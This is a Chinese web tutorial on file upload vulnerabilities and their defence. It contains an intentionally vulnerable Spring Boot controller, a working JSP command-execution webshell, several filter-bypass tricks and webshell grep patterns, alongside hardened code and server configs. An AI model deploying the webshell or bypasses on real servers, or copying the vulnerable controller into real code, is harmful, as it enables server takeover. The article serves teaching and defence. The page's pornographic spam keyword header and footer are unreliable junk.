亚洲有码Av一区二区三区_国产高清啪啪免费视频_69色视频国产_国产成人人人爆出白浆_国产精品自在线拍国_一本久久伊人热热精品无码_午夜性刺激在线看免费带字幕_助力高品质欧美狂喷水_亚洲精品日韩无码_精品无码一区二区三区蜜臀_麻豆高清国产AV_熟妇人素无码中文字幕_亚洲a级片在线观看_国产欧美日韩三区_99国产成人高清在线观看

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn)

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn) 在實(shí)際 Web 開發(fā)與安全測試中文件上傳功能是業(yè)務(wù)剛需也是安全重災(zāi)區(qū)。一個看似簡單的上傳接口背后涉及前端校驗(yàn)、后端處理、文件存儲、權(quán)限控制、安全過濾等多個環(huán)節(jié)任何一個環(huán)節(jié)的疏忽都可能導(dǎo)致嚴(yán)重的安全漏洞例如惡意文件上傳、服務(wù)器被控制、數(shù)據(jù)泄露等。對于開發(fā)者而言理解如何安全地實(shí)現(xiàn)文件上傳對于安全研究者或滲透測試人員而言理解如何發(fā)現(xiàn)并利用文件上傳漏洞是兩項(xiàng)同等重要的核心技能。本文將以一個實(shí)戰(zhàn)視角深入探討 Web 文件上傳的完整流程、常見安全漏洞的成因、攻擊手法以及對應(yīng)的防御策略。我們將從開發(fā)一個基礎(chǔ)的文件上傳功能開始逐步引入安全風(fēng)險并演示攻擊者如何繞過層層防御最終目標(biāo)是構(gòu)建一個既滿足業(yè)務(wù)需求又具備足夠安全性的文件上傳模塊。無論你是正在開發(fā)相關(guān)功能的 Java 或 PHP 開發(fā)者還是正在學(xué)習(xí) CTFCapture The Flag中 Web 題目或進(jìn)行滲透測試的安全愛好者這篇文章都將提供從原理到實(shí)踐的具體指導(dǎo)。1. 理解文件上傳的核心流程與安全邊界文件上傳不僅僅是用戶選擇文件并點(diǎn)擊“提交”按鈕那么簡單。一個完整的、考慮安全性的文件上傳流程通常涉及客戶端瀏覽器、服務(wù)器端應(yīng)用程序、服務(wù)器運(yùn)行環(huán)境如 Tomcat、Nginx以及最終的文件存儲系統(tǒng)本地磁盤、對象存儲等多個層面。1.1 標(biāo)準(zhǔn)文件上傳流程分解當(dāng)用戶通過網(wǎng)頁表單上傳文件時數(shù)據(jù)會以multipart/form-data的格式編碼并通過 HTTP POST 請求發(fā)送到服務(wù)器。服務(wù)器端應(yīng)用程序如 Spring MVC、Servlet、PHP接收到請求后需要解析這些復(fù)雜的數(shù)據(jù)提取出文件內(nèi)容和其他表單字段。一個簡化的安全上傳流程應(yīng)包含以下步驟前端校驗(yàn)通過 JavaScript 檢查文件大小、類型后綴名提供即時反饋提升用戶體驗(yàn)。注意前端校驗(yàn)極易被繞過絕不能作為安全依賴。HTTP 請求接收Web 容器如 Tomcat或框架如 Spring解析multipart/form-data請求。后端校驗(yàn)核心安全環(huán)節(jié)文件類型校驗(yàn)檢查文件的真實(shí)類型而非僅依賴后綴名。常用方法包括檢查文件內(nèi)容魔數(shù)Magic Number、MIME 類型。文件大小限制在代碼和服務(wù)器配置如 Nginx、Tomcat層面限制上傳文件大小防止拒絕服務(wù)攻擊DoS。文件名處理對上傳的文件名進(jìn)行重命名如使用 UUID防止路徑遍歷和覆蓋關(guān)鍵文件。內(nèi)容安全檢查對圖片文件進(jìn)行二次渲染對文本文件進(jìn)行惡意代碼掃描。安全存儲目錄權(quán)限上傳目錄應(yīng)設(shè)置為不可執(zhí)行腳本。例如在 Linux 下目錄權(quán)限應(yīng)為755文件權(quán)限應(yīng)為644。目錄隔離文件不應(yīng)存儲在 Web 根目錄下應(yīng)通過程序映射訪問。例如文件實(shí)際存儲在/var/uploads/通過/file/{id}這樣的控制器接口讀取并返回。使用對象存儲將文件上傳至阿里云 OSS、騰訊云 COS 等對象存儲服務(wù)徹底分離 Web 服務(wù)器和文件存儲。訪問控制對下載或訪問上傳文件的接口進(jìn)行權(quán)限校驗(yàn)防止未授權(quán)訪問。1.2 文件上傳漏洞的本質(zhì)文件上傳漏洞產(chǎn)生的根本原因在于服務(wù)器對用戶上傳的文件數(shù)據(jù)未進(jìn)行充分、有效的驗(yàn)證導(dǎo)致攻擊者能夠上傳被服務(wù)器解釋執(zhí)行的可執(zhí)行文件如.jsp,.php,.asp或特定配置下的.jpg。攻擊成功的關(guān)鍵在于上傳的文件必須能夠被 Web 服務(wù)器以某種方式“執(zhí)行”。例如上傳一個.jsp文件到 Tomcat 的 Web 應(yīng)用目錄該文件就會被 Tomcat 的 JSP 引擎編譯執(zhí)行。上傳一個.php文件到 Apache PHP 環(huán)境的網(wǎng)站根目錄該文件就會被 PHP 解析器執(zhí)行。在某些錯誤配置下上傳一個包含 PHP 代碼的.jpg文件如果服務(wù)器配置了AddType application/x-httpd-php .jpg該圖片文件也會被當(dāng)作 PHP 執(zhí)行。2. 環(huán)境準(zhǔn)備與靶場搭建為了清晰地演示漏洞和防御我們需要一個實(shí)驗(yàn)環(huán)境。你可以選擇以下任意一種方式2.1 使用 Docker 快速搭建漏洞靶場對于安全學(xué)習(xí)使用現(xiàn)成的漏洞靶場是最快的方式。這里推薦upload-labs一個專注于文件上傳漏洞的練習(xí)平臺。# 1. 確保已安裝 Docker docker --version # 2. 拉取 upload-labs 鏡像 docker pull c0ny1/upload-labs # 3. 運(yùn)行容器將容器內(nèi)80端口映射到宿主機(jī)的8080端口 docker run -d -p 8080:80 --name upload-labs c0ny1/upload-labs # 4. 訪問 http://localhost:8080 即可開始挑戰(zhàn)2.2 手動創(chuàng)建簡易漏洞演示項(xiàng)目Java Web如果你想從開發(fā)者視角理解漏洞產(chǎn)生可以創(chuàng)建一個簡單的 Spring Boot 項(xiàng)目。項(xiàng)目初始化使用 Spring Initializr 或 IDE 創(chuàng)建一個 Spring Boot 項(xiàng)目依賴選擇Spring Web和Thymeleaf用于簡單前端。創(chuàng)建上傳頁面(src/main/resources/templates/upload.html)!DOCTYPE html html xmlns:thhttp://www.thymeleaf.org head meta charsetUTF-8 title不安全的上傳演示/title /head body h2文件上傳不安全版本/h2 form action/upload methodpost enctypemultipart/form-data input typefile namefile / br/br/ input typesubmit value上傳 / /form p th:text${message}/p /body /html創(chuàng)建漏洞控制器(src/main/java/com/example/demo/controller/UnsafeUploadController.java)import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.multipart.MultipartFile; import org.springframework.web.servlet.ModelAndView; import java.io.File; import java.io.IOException; Controller public class UnsafeUploadController { // 定義一個不安全的存儲路徑在Web可訪問目錄下 private final String UPLOAD_DIR src/main/resources/static/uploads/; GetMapping(/) public String index() { return upload; } PostMapping(/upload) public ModelAndView handleFileUpload(RequestParam(file) MultipartFile file) { ModelAndView mav new ModelAndView(upload); if (file.isEmpty()) { mav.addObject(message, 請選擇一個文件上傳。); return mav; } try { // 漏洞點(diǎn)1直接使用原始文件名存在路徑遍歷風(fēng)險 String fileName file.getOriginalFilename(); // 漏洞點(diǎn)2文件存儲在Web靜態(tài)資源目錄下可直接通過URL訪問 File dest new File(UPLOAD_DIR fileName); // 創(chuàng)建目錄如果不存在 dest.getParentFile().mkdirs(); file.transferTo(dest); mav.addObject(message, 文件上傳成功: dest.getAbsolutePath()); } catch (IOException e) { e.printStackTrace(); mav.addObject(message, 文件上傳失敗: e.getMessage()); } return mav; } }配置(src/main/resources/application.properties)# 設(shè)置單個文件最大大小僅為示例實(shí)際需要更多配置 spring.servlet.multipart.max-file-size10MB spring.servlet.multipart.max-request-size10MB運(yùn)行這個 Spring Boot 應(yīng)用你就擁有了一個具備典型漏洞的上傳點(diǎn)。3. 常見文件上傳漏洞攻擊手法與演示我們將基于上面創(chuàng)建的簡易漏洞項(xiàng)目演示幾種常見的攻擊手法。3.1 攻擊手法一直接上傳 Webshell這是最基礎(chǔ)的情況服務(wù)器未做任何過濾。準(zhǔn)備 Webshell創(chuàng)建一個簡單的 JSP Webshell 文件shell.jsp。% page importjava.util.*,java.io.*% % // 非常簡單的命令執(zhí)行Webshell if(request.getParameter(cmd) ! null) { Process p Runtime.getRuntime().exec(request.getParameter(cmd)); OutputStream os p.getOutputStream(); InputStream in p.getInputStream(); DataInputStream dis new DataInputStream(in); String disr dis.readLine(); while ( disr ! null ) { out.println(disr); disr dis.readLine(); } } %發(fā)起攻擊訪問http://localhost:8080/選擇shell.jsp文件并上傳。訪問 Webshell如果上傳成功文件將位于http://localhost:8080/uploads/shell.jsp。訪問該 URL并附加參數(shù)?cmdwhoami即可在頁面上看到服務(wù)器執(zhí)行whoami命令的結(jié)果。漏洞原因后端代碼未對文件后綴名、內(nèi)容做任何檢查且文件存儲在 Web 可訪問目錄。3.2 攻擊手法二繞過前端校驗(yàn)很多網(wǎng)站僅在前端通過 JavaScript 檢查文件后綴名。前端校驗(yàn)示例在upload.html的form標(biāo)簽前添加 JS 代碼。script function checkFile() { var file document.querySelector(input[typefile]).files[0]; var fileName file.name; var ext fileName.substring(fileName.lastIndexOf(.) 1).toLowerCase(); if (ext ! jpg ext ! png ext ! gif) { alert(只允許上傳圖片文件 (jpg, png, gif)); return false; } return true; } /script form ... onsubmitreturn checkFile() ...繞過方法方法A禁用JS在瀏覽器設(shè)置中禁用 JavaScript即可直接上傳任意文件。方法B代理攔截修改使用 Burp Suite 或 Fiddler 等抓包工具。先正常選擇一個test.jpg文件上傳用抓包工具截獲 POST 請求。在抓包工具中將請求體中的文件名test.jpg修改為shell.jsp同時確保文件內(nèi)容Content-Disposition部分和后續(xù)的二進(jìn)制內(nèi)容是正確的 Webshell 代碼。將修改后的請求發(fā)送給服務(wù)器。結(jié)果服務(wù)器接收到的是shell.jsp的文件名和內(nèi)容前端校驗(yàn)被完全繞過。漏洞原因信任了完全由客戶端控制的數(shù)據(jù)。3.3 攻擊手法三繞過黑名單校驗(yàn)特殊解析漏洞假設(shè)后端采用了黑名單機(jī)制禁止了.jsp,.php,.asp等后綴。// 在Controller中添加黑名單檢查 String[] blackList {.jsp, .php, .asp, .aspx, .jspx}; String fileName file.getOriginalFilename().toLowerCase(); for (String badExt : blackList) { if (fileName.endsWith(badExt)) { mav.addObject(message, 禁止上傳此類文件); return mav; } }攻擊者可以嘗試以下繞過方式大小寫繞過.Jsp,.PhP如果后端校驗(yàn)時未統(tǒng)一轉(zhuǎn)為小寫。雙寫后綴繞過shell.jsp.jsp如果后端只簡單地刪除一次.jsp字符串。空格/點(diǎn)號繞過shell.jsp.或shell.jsp末尾空格在某些系統(tǒng)處理文件名時會被忽略。利用解析特性Apache如果配置不當(dāng)shell.php.jpg可能被解析為.php文件。IIS 6.0shell.asp;.jpg或shell.asp:.jpg目錄名曾是有名的解析漏洞。Nginx錯誤配置fastcgi導(dǎo)致shell.jpg/.php被解析為 PHP 文件。.htaccess攻擊針對 Apache如果服務(wù)器允許上傳.htaccess文件攻擊者可以上傳一個自定義的.htaccess內(nèi)容為AddType application/x-httpd-php .jpg這將使該目錄下所有.jpg文件都被當(dāng)作 PHP 執(zhí)行。然后再上傳一個包含 PHP 代碼的shell.jpg即可。3.4 攻擊手法四繞過內(nèi)容類型MIME校驗(yàn)有些后端會檢查 HTTP 請求頭中的Content-Type。// 檢查Content-Type if (!file.getContentType().equals(image/jpeg) !file.getContentType().equals(image/png)) { mav.addObject(message, 文件類型不正確); return mav; }繞過方法和繞過前端校驗(yàn)一樣使用抓包工具如 Burp Suite直接修改請求頭中的Content-Type將其改為image/jpeg而請求體中的文件內(nèi)容仍然是 Webshell。漏洞原因Content-Type同樣來自客戶端請求頭完全可控不可信。3.5 攻擊手法五利用文件包含漏洞配合上傳這是一種組合攻擊。假設(shè)網(wǎng)站存在文件包含漏洞如 PHP 的include($_GET[‘file’])且上傳功能對圖片內(nèi)容做了嚴(yán)格檢查如二次渲染導(dǎo)致無法直接上傳可執(zhí)行腳本。攻擊步驟上傳一個內(nèi)容為?php phpinfo();?的純文本文件命名為info.txt。由于內(nèi)容是文本可能通過檢查。利用文件包含漏洞訪問http://victim.com/include.php?file./uploads/info.txt。服務(wù)器執(zhí)行了include將info.txt的內(nèi)容作為 PHP 代碼解析從而執(zhí)行了phpinfo()。漏洞原因上傳點(diǎn)與文件包含漏洞點(diǎn)形成“組合拳”本地文件包含LFI可以包含用戶上傳的文件。4. 構(gòu)建安全的文件上傳功能了解了攻擊方式我們就可以有針對性地構(gòu)建防御。安全是一個過程需要多層防護(hù)。4.1 防御策略總覽防御層具體措施目的前端JS 校驗(yàn)文件大小、類型改善用戶體驗(yàn)非安全措施網(wǎng)絡(luò)層WAFWeb應(yīng)用防火墻攔截已知攻擊payload應(yīng)用層核心1. 白名單文件后綴2. 校驗(yàn)文件類型魔數(shù)3. 重命名文件UUID4. 限制文件大小5. 圖片二次渲染/壓縮6. 病毒/惡意代碼掃描實(shí)現(xiàn)業(yè)務(wù)邏輯層面的安全校驗(yàn)服務(wù)器配置1. 上傳目錄無執(zhí)行權(quán)限2. 資源文件通過程序讀取3. 定期清理未關(guān)聯(lián)文件防止上傳的文件被直接執(zhí)行架構(gòu)層使用對象存儲OSS/COS實(shí)現(xiàn)業(yè)務(wù)服務(wù)器與文件存儲分離4.2 安全上傳代碼實(shí)現(xiàn)Java Spring Boot 示例下面是一個相對安全的文件上傳控制器實(shí)現(xiàn)import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.*; import org.springframework.web.multipart.MultipartFile; import org.apache.commons.io.FilenameUtils; import org.apache.tika.Tika; import javax.imageio.ImageIO; import java.awt.image.BufferedImage; import java.io.*; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.Arrays; import java.util.List; import java.util.UUID; Controller public class SafeUploadController { // 從配置文件中讀取確保不在Web目錄下 Value(${app.upload.dir:/var/uploads/}) private String uploadBaseDir; // 允許上傳的文件類型白名單后綴名 private static final ListString ALLOWED_EXTENSIONS Arrays.asList(jpg, jpeg, png, gif); // 允許的MIME類型白名單 private static final ListString ALLOWED_MIME_TYPES Arrays.asList(image/jpeg, image/png, image/gif); // 最大文件大小 5MB private static final long MAX_FILE_SIZE 5 * 1024 * 1024; PostMapping(/safe-upload) ResponseBody public String handleSafeFileUpload(RequestParam(file) MultipartFile file) { // 1. 檢查文件是否為空 if (file.isEmpty()) { return 文件為空。; } // 2. 檢查文件大小 if (file.getSize() MAX_FILE_SIZE) { return 文件大小超過限制5MB。; } // 3. 校驗(yàn)文件后綴名白名單 String originalFileName file.getOriginalFilename(); String fileExtension FilenameUtils.getExtension(originalFileName).toLowerCase(); if (!ALLOWED_EXTENSIONS.contains(fileExtension)) { return 不支持的文件類型。; } // 4. 校驗(yàn)文件真實(shí)類型使用Apache Tika檢測魔數(shù) try { Tika tika new Tika(); String detectedType tika.detect(file.getBytes()); if (!ALLOWED_MIME_TYPES.contains(detectedType)) { return 文件真實(shí)類型與后綴名不符或不被允許。; } } catch (IOException e) { return 文件類型檢測失敗。; } // 5. 如果是圖片可以進(jìn)行二次渲染徹底清除元數(shù)據(jù)和非圖像數(shù)據(jù) if (fileExtension.matches(jpg|jpeg|png|gif)) { try { BufferedImage image ImageIO.read(file.getInputStream()); if (image null) { return 上傳的文件不是有效的圖片。; } // 這里可以添加圖片壓縮、縮放等處理 // ImageIO.write(image, png, ...); } catch (IOException e) { return 圖片處理失敗文件可能已損壞。; } } // 6. 生成安全的存儲文件名和路徑 String safeFileName UUID.randomUUID().toString() . fileExtension; // 使用UUID重命名 Path uploadPath Paths.get(uploadBaseDir).toAbsolutePath().normalize(); Path filePath uploadPath.resolve(safeFileName); // 確保上傳目錄存在且安全 try { Files.createDirectories(uploadPath); // 重要檢查目錄是否在預(yù)期范圍內(nèi)防止路徑遍歷 if (!filePath.normalize().startsWith(uploadPath.normalize())) { return 無效的文件路徑。; } } catch (IOException e) { return 無法創(chuàng)建上傳目錄。; } // 7. 保存文件 try (InputStream inputStream file.getInputStream()) { Files.copy(inputStream, filePath); } catch (IOException e) { return 文件保存失敗。; } // 8. 返回文件訪問ID非真實(shí)路徑通過另一個安全接口訪問 String fileId safeFileName; // 實(shí)際可能用數(shù)據(jù)庫關(guān)聯(lián)ID return 文件上傳成功。訪問ID: fileId; } // 安全訪問文件的接口 GetMapping(/file/{fileId}) public void getFile(PathVariable String fileId, HttpServletResponse response) { // 1. 根據(jù)fileId從數(shù)據(jù)庫或緩存中查詢真實(shí)文件名和路徑此處簡化 // 2. 進(jìn)行權(quán)限校驗(yàn)如用戶是否登錄、是否有權(quán)訪問此文件 // 3. 從安全的存儲目錄讀取文件流 Path filePath Paths.get(uploadBaseDir, fileId).normalize(); File file filePath.toFile(); if (!file.exists()) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); return; } // 4. 設(shè)置正確的Content-Type并輸出流 response.setContentType(Files.probeContentType(filePath)); try (OutputStream os response.getOutputStream(); FileInputStream fis new FileInputStream(file)) { byte[] buffer new byte[1024]; int bytesRead; while ((bytesRead fis.read(buffer)) ! -1) { os.write(buffer, 0, bytesRead); } os.flush(); } catch (IOException e) { response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR); } } }關(guān)鍵防御點(diǎn)解釋白名單校驗(yàn)只允許明確需要的文件類型。文件類型檢測使用 Apache Tika 等庫通過文件內(nèi)容的魔數(shù)判斷真實(shí)類型不信任后綴名和Content-Type。圖片二次渲染使用ImageIO.read和write處理圖片可以剝離可能隱藏在元數(shù)據(jù)如 EXIF或文件冗余數(shù)據(jù)區(qū)中的惡意代碼。文件重命名使用 UUID 等隨機(jī)字符串避免文件名沖突和路徑遍歷攻擊。路徑安全使用Paths.get().normalize()和startsWith()檢查防止../../../etc/passwd這類路徑遍歷。存儲隔離文件存儲在 Web 根目錄之外如/var/uploads/不能通過http://domain/uploads/xxx直接訪問必須通過后端控制器/file/{id}進(jìn)行鑒權(quán)后訪問。4.3 服務(wù)器與中間件安全配置代碼層面的安全需要配合服務(wù)器配置才能生效。Nginx 配置示例防止上傳目錄執(zhí)行腳本location ^~ /uploads/ { # 如果文件必須放在Web目錄下則禁止執(zhí)行任何腳本 location ~* \.(jsp|php|asp|aspx|pl|py)$ { deny all; return 403; } # 或者對于上傳目錄直接返回403 # deny all; # return 403; }Apache 配置示例在.htaccess或httpd.conf中Directory /var/www/html/uploads # 禁止執(zhí)行任何腳本 php_flag engine off RemoveHandler .php .php3 .php4 .php5 .php7 .phtml RemoveType .php .php3 .php4 .php5 .php7 .phtml # 只允許訪問圖片等靜態(tài)文件 FilesMatch \.(jpg|jpeg|png|gif|ico|txt|pdf)$ Order Allow,Deny Allow from all /FilesMatch FilesMatch \.(php|pl|py|jsp|asp|sh|cgi)$ Order Deny,Allow Deny from all /FilesMatch /DirectoryLinux 目錄權(quán)限# 上傳目錄應(yīng)屬于運(yùn)行Web服務(wù)的用戶如www-data, tomcat chown -R www-data:www-data /var/uploads/ # 目錄權(quán)限755文件權(quán)限644確保目錄不可寫除非需要上傳 chmod 755 /var/uploads/ # 如果程序需要寫文件可以設(shè)置目錄為775但務(wù)必確保沒有執(zhí)行權(quán)限問題5. 文件上傳漏洞的排查與應(yīng)急響應(yīng)即使采取了措施也可能存在未知的繞過方式。需要建立監(jiān)控和響應(yīng)機(jī)制。5.1 如何發(fā)現(xiàn)文件上傳漏洞作為開發(fā)者/防御方代碼審計檢查文件上傳相關(guān)代碼是否僅依賴黑名單、是否未校驗(yàn)內(nèi)容、是否存儲路徑可訪問。日志分析監(jiān)控上傳接口的訪問日志尋找異常請求如頻繁上傳、異常后綴、過大文件。文件系統(tǒng)監(jiān)控使用inotify等工具監(jiān)控上傳目錄警惕非圖片文件尤其是.jsp,.php,.htaccess的出現(xiàn)。安全掃描使用 AWVS、Nessus 或開源工具定期對上傳功能進(jìn)行掃描。作為攻擊方/滲透測試方模糊測試使用 Burp Suite Intruder 或自定義腳本批量嘗試各種繞過技巧大小寫、雙寫、特殊字符、不同 Content-Type。解析漏洞測試針對特定服務(wù)器IIS, Nginx, Apache測試歷史解析漏洞的變種。組合漏洞測試檢查是否存在文件包含、任意文件讀取等漏洞可與上傳點(diǎn)結(jié)合利用。5.2 常見問題排查清單當(dāng)懷疑存在文件上傳漏洞或已遭攻擊時按此清單排查排查項(xiàng)操作命令/檢查點(diǎn)說明1. 檢查近期上傳文件find /var/www/html/uploads -type f -mtime -1(查找1天內(nèi)修改的文件)快速定位可疑新增文件。2. 查找Webshell特征grep -r Runtime.getRuntime|eval(|system(|passthru|shell_exec /var/www/html/在Web目錄中搜索常見危險函數(shù)。3. 檢查服務(wù)器進(jìn)程ps auxgrep java|php|tomcat或netstat -tulnp4. 分析Web訪問日志tail -f /var/log/nginx/access.log | grep \POST.*upload\或搜索.jsp,.php的訪問記錄。定位攻擊來源和攻擊時間。5. 檢查定時任務(wù)crontab -l(當(dāng)前用戶) 和ls /etc/cron.*Webshell 常會添加后門定時任務(wù)。6. 檢查系統(tǒng)用戶cat /etc/passwd查看是否有新增的未知用戶。7. 驗(yàn)證修復(fù)是否生效重新嘗試之前成功的攻擊 payload確認(rèn)是否被攔截。確保修復(fù)措施已生效。5.3 應(yīng)急響應(yīng)步驟隔離立即禁用文件上傳功能或整個應(yīng)用。定位根據(jù)上述排查清單找到被上傳的惡意文件。清除刪除所有發(fā)現(xiàn)的 Webshell 和異常文件。注意檢查文件創(chuàng)建時間、隱藏文件以.開頭、以及可能被插入惡意代碼的正常文件。溯源分析日志確定攻擊入口、攻擊者 IP、攻擊時間線。修復(fù)根據(jù)漏洞原因?qū)嵤┍菊碌?節(jié)的安全措施。加固修復(fù)服務(wù)器配置審查所有上傳點(diǎn)代碼考慮引入 WAF 規(guī)則。監(jiān)控加強(qiáng)日志審計和文件監(jiān)控設(shè)置告警。6. 進(jìn)階話題與最佳實(shí)踐6.1 使用對象存儲服務(wù)將文件上傳至云端對象存儲如阿里云 OSS、騰訊云 COS、MinIO是當(dāng)前的最佳實(shí)踐。它帶來了多重好處安全分離業(yè)務(wù)服務(wù)器與文件存儲分離即使文件被上傳惡意腳本也無法在業(yè)務(wù)服務(wù)器上執(zhí)行。彈性擴(kuò)展存儲容量和帶寬易于擴(kuò)展。高可用與持久性對象存儲通常提供多副本冗余。便捷處理很多服務(wù)提供圖片處理、視頻截幀等能力。集成時通常由業(yè)務(wù)服務(wù)器向?qū)ο蟠鎯Ψ?wù)商申請一個臨時的上傳憑證STS Token前端直接使用該憑證將文件上傳至對象存儲上傳成功后對象存儲回調(diào)業(yè)務(wù)服務(wù)器或前端通知業(yè)務(wù)服務(wù)器文件信息如 URL。業(yè)務(wù)服務(wù)器只保存文件的元信息如存儲路徑、大小、類型不直接處理文件流。6.2 文件內(nèi)容深度檢查對于高風(fēng)險場景需要更深入的內(nèi)容檢查反病毒掃描集成 ClamAV 等開源殺毒引擎對上傳文件進(jìn)行掃描。靜態(tài)代碼分析對于允許上傳的文本文件如 PDF, DOC可以檢查是否包含惡意宏或腳本。沙箱動態(tài)檢測對于無法確認(rèn)的文件可以將其在隔離的沙箱環(huán)境中運(yùn)行觀察其行為。6.3 針對 CTF 與滲透測試的特別技巧在 CTF 或授權(quán)滲透測試中目標(biāo)往往是刻意存在漏洞的。除了上述常見方法還需注意信息收集查看網(wǎng)頁源碼、JS 文件尋找隱藏的上傳點(diǎn)或提示。檢查 HTTP 響應(yīng)頭有時錯誤信息或特殊的響應(yīng)頭會提示服務(wù)器類型、組件版本。嘗試各種解析漏洞研究目標(biāo)服務(wù)器Apache/Nginx/IIS/Tomcat特定版本的已知解析漏洞。利用條件競爭如果服務(wù)器先保存文件再檢查內(nèi)容可能存在時間差可以嘗試在文件被刪除前訪問并執(zhí)行它。結(jié)合其他漏洞如目錄遍歷、文件包含、XXEXML外部實(shí)體注入等與文件上傳結(jié)合形成攻擊鏈。文件上傳功能是 Web 安全的試金石。一個健壯的上傳模塊需要開發(fā)者具備防御性編程思維不信任任何來自客戶端的數(shù)據(jù)并在前端、后端、服務(wù)器配置、網(wǎng)絡(luò)架構(gòu)多個層面實(shí)施縱深防御。對于安全人員而言理解攻擊者的繞過手法是進(jìn)行有效代碼審計和滲透測試的基礎(chǔ)。在實(shí)踐中沒有一勞永逸的銀彈持續(xù)關(guān)注新的攻擊手法定期審查和更新安全策略才是保障系統(tǒng)安全的關(guān)鍵。建議將本文中的安全代碼示例作為起點(diǎn)結(jié)合項(xiàng)目的具體業(yè)務(wù)邏輯和架構(gòu)構(gòu)建適合自身的安全上傳方案。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
91 亚洲 欧洲| 色y情视频免费看| 狠狠狠一区二区三区| 乱伦一二三区| 亚春色色| 91处女在线视频| 999久久久九| 精品午夜福利国产一区二区在线观看| 国产成人精品午夜福利| 嗯嗯嗯啊啊啊在线免费观看| 久久性爱城| 26UUU欧美日本| 人妻色情天天操| 久久999久| 五月丁香在线| 九九久久一区二区伦理| 浓厚中出中文字幕在线| 97超碰护士| 天操天操夜操夜月月年年操操| 97舔舔| 中文字幕狠狠玩| 国产美女在线精品免费看| 91九色丰满高潮| 久久久久久久久久黄色网| 亚洲五月丁香花狠狠干一区二区三区 | 久久久亚洲Av| 熟妇综合一区二区三区| 色综合一区二区三区| 日本道日本道中文字幕日本道最新日本道在线观看 | 欲色啪| 日韩AV一区二区三区三州三州| 柠檬AV导航| 日本欧美一区二区三区免费| 亚洲 欧美 偷拍 唯美| 超碰色老头| 台湾佬中文娱乐网久久久久久久久久com| 97中文超碰| 99自拍视频在线观看| 秋霞成人一级在线观看| 91在线视频免费播放| 91人妻人人澡人人爽人人精品| 国产精品97视频| 涩亚洲欧洲| 99热大香蕉伊在线| 老色鬼成人精品视频下载大在线观看| 亚洲视频小说| 加勒比日本在线| 日韩人妻精品久久久久| 亚洲91少妇| 懂色AV一区二区三区| 国产一区二区三区精品观看啪| 欧美天天干| 人妻 制服 日韩 中文 在线| 亚洲码专区| 美女的肌被草喷水视频| 亚洲熟妇丝袜在线观看| av一区二区三区四区五区久草臀| 国产一区麻豆免费观看| 刺激精品视频| 日韩淫色网| 日本大香蕉| ′ !γ}丶。。久久精品欧美一区二区三区| 日本性交操一区二区不卡系列| 青草精品视频日本久久久久网站在线| 日本操逼无码| 超碰人人色| 九九九九久久久| 五月婷婷六月丁香| 色哟哟-国产专区| 欧美高清性猛交| 精产国品一区二三产品| 国产精品96久久久久久| 97超碰人人操人人操| 亚洲日韩精品久久久久一区壹牛 | 欧美视频一区二区在线| 开心五月深爱五月| 成人情色综合网| 久久超碰日韩精品| 日韩国产乱子伦App| 99热自拍| 国产肏屁眼视频| 欧美日本视频一区| av网站免费看| 色情乱伦AV| 99热官网| 精品97久久| 欧美视频第二页| 嫩草 人人网精品| 午夜精品久久久久久久99热影院| 久草综合视频| 亚洲系列欧美| 成人小电影网站tex| 最新日本中文字幕| 香蕉综合网| 精品69网| 中文字幕后石码四区五区| 天天看天天日天天操| 色噜噜狠狠色综无码久久合欧美| 以及麻豆国产入口在线观看免费| 色黄污美女啪啪啪免费网站| 色婷婷香蕉| 丝袜夫妻自拍| 亚洲AV在线资源| 超碰97首页| 欧洲性爱无码区| 日韩乱伦视频| 91欧美美女日韩国产婷婷| 日韩综合97P| 台湾佬中文娱乐自偷自拍| 久久人妻四季| 天天搞欧美| 国产精品96久久久久久| 天堂中文日本在线观看| av72网| 久久久久久久久久久精| 曰韩成人免费视频| 成人热久久精品| 日本性感人妻91| 日本污ww视频网站| 欧美啪啪色吧在线| av中文在线| 男人亚洲91首页在线| 精吧天堂| 五月天婷婷欧美三区| 亚洲中文丝袜美腿诱惑字幕| 人人天天干干| 亚洲清纯唯美| 激情文学网伊人| 99精品人妻| 日韩熟女精品无码专区一区二区| 色噜噜国产精品视频一区二区| 99re6久热只有精品6在线直播| 欧美黑人极品高潮喷吹熟女黑人性暴力日韩在线欧美极品一区二区老师 | 久久精品一区| 亚洲精品一卡二卡三卡福利视频网站| 五月婷婷六月丁香| 翔田千里AⅤHD无码| 东北老女人的激情视频| 404操逼福利视频| 人妻黑丝袜电影| 抽插无码高清一区| 久草尤物| 热热色青青草| 天天干天天日天天射黄色片| 亚洲制服欧美另类内射| 91热热色| 国产视频一区二区在线| 国产www色在线观看| 日韩ab网 | 中文字幕日韩精品久久| 麻豆天美在线| 狠狠夜色午夜久久综合在线| 人人爽天天爽| 女同女同恋久久级三级| 欧美综合加勒比在线| 激情无码日韩| 操操逼视频| 四虎影视精品| 大香蕉伊然在亚洲91| 老熟女91av| 亚洲黄色a级片| 91天天看| 加勒比五月天| 夜夜嗨一区二区三区三州加勒比| 天天综合有色网| 欧美十八禁在线看| 人妻少妇视频在线播放| 色小视频蜜乳| 强免费黄色网址| 嫩呦国产一区二区三区AV| 91香蕉视频在线观看免费| 国产精品日韩在线一区| 人人玩人人添人人澡免费| 日韩欧美中文字| 色97干| 91劲爆| 少妇色综合| 老熟妇一区二区三区啪啪| 精品人妻一区二区免费蜜桃| 天堂国产AV| 亚洲欧美经典一区二区| 欧美三级免费伊人| 日本最新免费韩国1区2区视频播放| 日本天堂网| 欧洲精品久久| 99精品综合久久久久五月天| 热热色91| 尤物视频视频官网| 日韩国产中文字幕| 六九九九| 亚洲第一二区另类图| 青青操日韩| 色97干| 岛国在线国产| 亚洲欧洲另类| 婷婷另类小说| 久久久91| 美国一区二区三区视频| 成人免费在线网站| 97欧美精品综合| 久久亚洲天堂| 动漫爆乳3D奶水一区在线观看 | AA丁香综合激情| 综合天天网| 欧美夜夜| 懂色AV蜜臀无码精品APP | 啊啊啊久久久视频| 尤物视频一区| 成人av动漫在线观看| 